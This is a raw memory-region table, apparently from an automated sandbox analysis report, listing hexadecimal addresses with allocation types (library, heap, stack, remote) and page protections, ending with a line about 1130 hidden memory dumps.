25120000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
28160000
trusted library allocation
page read and write
28F64AF0000
trusted library allocation
page read and write
20B8F1A0000
heap
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
B1D0000
direct allocation
page execute and read and write
27F1E000
stack
page read and write
7FF7C0050000
trusted library allocation
page read and write
247F0000
direct allocation
page read and write
42D0000
heap
page execute and read and write
272BD000
trusted library allocation
page read and write
266C1000
trusted library allocation
page read and write
B6392FE000
stack
page read and write
434E000
stack
page read and write
28F54FDB000
trusted library allocation
page read and write
26A0000
trusted library section
page read and write
28020000
trusted library allocation
page execute and read and write
27380000
trusted library allocation
page read and write
20B910B6000
heap
page read and write
7FF7BFF95000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
24D4D000
stack
page read and write
7F34000
heap
page read and write
B638DEF000
stack
page read and write
20B91104000
heap
page read and write
B63967E000
stack
page read and write
24F5E000
stack
page read and write
2658E000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
26271000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
26444000
trusted library allocation
page read and write
28F6CEE5000
heap
page read and write
27380000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
6850000
direct allocation
page read and write
25120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F298000
heap
page read and write
97CB000
heap
page read and write
24CCD000
stack
page read and write
28170000
trusted library allocation
page read and write
27FFF000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28150000
trusted library allocation
page read and write
20B912A0000
heap
page read and write
27F5E000
stack
page read and write
28020000
trusted library allocation
page read and write
27380000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
6A6E000
stack
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
20B910B6000
heap
page read and write
28180000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
211D1FF000
stack
page read and write
9847000
heap
page read and write
20B91104000
heap
page read and write
7FF7C0060000
trusted library allocation
page read and write
20B91448000
heap
page read and write
211D0FD000
stack
page read and write
28020000
trusted library allocation
page read and write
B63927C000
stack
page read and write
251D0000
trusted library allocation
page read and write
7FF7C0070000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F6D220000
heap
page read and write
251D0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
25090000
trusted library allocation
page read and write
251CE000
stack
page read and write
251D0000
trusted library allocation
page read and write
20B8F252000
heap
page read and write
26C0000
heap
page read and write
7D60000
trusted library allocation
page read and write
7F0C000
stack
page read and write
7070000
trusted library allocation
page read and write
25120000
trusted library allocation
page read and write
2627A000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
25498000
trusted library allocation
page read and write
26570000
trusted library allocation
page read and write
20B9108F000
heap
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
20B8F21E000
heap
page read and write
251D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
B63987B000
stack
page read and write
20B8F1DB000
heap
page read and write
7FF7C00A0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
4370000
remote allocation
page execute and read and write
7FF7BFDB2000
trusted library allocation
page read and write
28000000
trusted library allocation
page read and write
27880000
trusted library allocation
page read and write
253D2000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
B63A24E000
stack
page read and write
27FF0000
trusted library allocation
page read and write
7AB7000
stack
page read and write
2729B000
trusted library allocation
page read and write
28F6CED5000
heap
page read and write
26577000
trusted library allocation
page read and write
28120000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28170000
trusted library allocation
page read and write
20B8F1C8000
heap
page read and write
28F6CF40000
heap
page read and write
28020000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
28F568F1000
trusted library allocation
page read and write
278A0000
trusted library allocation
page read and write
27390000
trusted library allocation
page read and write
28F54B66000
trusted library allocation
page read and write
28F56895000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
262EA000
trusted library allocation
page read and write
7FF7BFF97000
trusted library allocation
page read and write
27FF0000
trusted library allocation
page read and write
26680000
trusted library allocation
page read and write
28F54FDF000
trusted library allocation
page read and write
There are 1130 hidden memdumps, click here to show them.